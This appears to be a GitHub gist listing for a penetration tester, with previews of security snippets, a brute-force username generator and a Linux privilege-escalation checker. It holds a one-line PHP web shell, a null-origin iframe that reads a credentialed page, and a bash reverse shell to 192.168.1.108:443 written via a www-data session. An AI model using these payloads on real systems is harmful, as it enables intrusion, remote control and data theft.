I hereby claim:
- I am avicoder on github.
- I am avicoder (https://keybase.io/avicoder) on keybase.
- I have a public key ASA5E3ToP1__j0WJ0hVsfEKPF-t9pWa1Ka31uZpGM32rawo
To claim this, I am signing this object:
avicoder
/ Null-origin-code.html
Created
April 24, 2018 07:27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <iframe src='data:text/html,<script> | |
| var xhr = new XMLHttpRequest(); | |
| xhr.open("GET", "https://vuln-app.com/confidential", true); | |
| xhr.withCredentials = true; | |
| xhr.onload = function () { | |
| if (xhr.readyState === xhr.DONE) { | |
| console.log(xhr.response); | |
| } |
avicoder
/ Keybase.md
Last active
December 26, 2017 12:49
- Arbitrary file access
- Binary planting
- Blind SQL Injection
- Blind XPath Injection
- Brute force attack
- Buffer overflow attack
- Cache Poisoning
- Cash Overflow
- Clickjacking
- Command injection attacks
avicoder
/ .pystartup
Created
September 20, 2017 06:08
— forked from matterche/.pystartup
Enable Python REPL command history and tab completion
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Store this file in ~/.pystartup, | |
| # set "export PYTHONSTARTUP=/home/user/.pystartup" | |
| # | |
| # Note that PYTHONSTARTUP does *not* expand "~", so you have to put in the | |
| # full path to your home directory. | |
| import atexit | |
| import os | |
| import readline | |
| import rlcompleter |
avicoder
/ how-to-oscp-final.md
Created
August 7, 2017 13:31
— forked from unfo/how-to-oscp-final.md
avicoder
/ namemash.py
Created
August 7, 2017 05:28
— forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| if __name__ == "__main__": | |
| if len(sys.argv) != 2: | |
| print "usage: %s names.txt" % (sys.argv[0]) | |
| sys.exit(0) | |
| for line in open(sys.argv[1]): | |
| name = ''.join([c for c in line if c == " " or c.isalpha()]) |
avicoder
/ gist:61df8adeac2becdf2b53179521d250e4
Created
March 27, 2017 07:43
Compile python source code on mac - Commands
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -OL http://www.python.org/ftp/python/2.7.11/Python-2.7.11.tgz | |
| tar xzvf Python-2.7.11.tgz | |
| cd Python-2.7.11 | |
| ./configure --prefix=/usr/local --enable-shared | |
| make | |
| make install |
avicoder
/ linuxprivesc.py
Created
January 17, 2017 16:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/env python | |
| ############################################################################################################### | |
| ## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script | |
| ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift | |
| ##------------------------------------------------------------------------------------------------------------- | |
| ## [Details]: | |
| ## This script is intended to be executed locally on a Linux box to enumerate basic system info and | |
| ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text | |
| ## passwords and applicable exploits. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| system($_GET['cmd']); | |
| ?> |
I'd faced issue while executing any command using .run command as it doesn't supporting white spaces and raising exception(for example ls index.html).
I figured up it by creating a .sh file with limited privledge session(www-data) in /html directory.
echo "#! bin/bash" > abc.sh
echo $'\n' >> abc.sh
echo "bash -i >& /dev/tcp/192.168.1.108/443 0>&1" >>abc.sh
chmod +x abc.sh
Now in hexchat exexcute: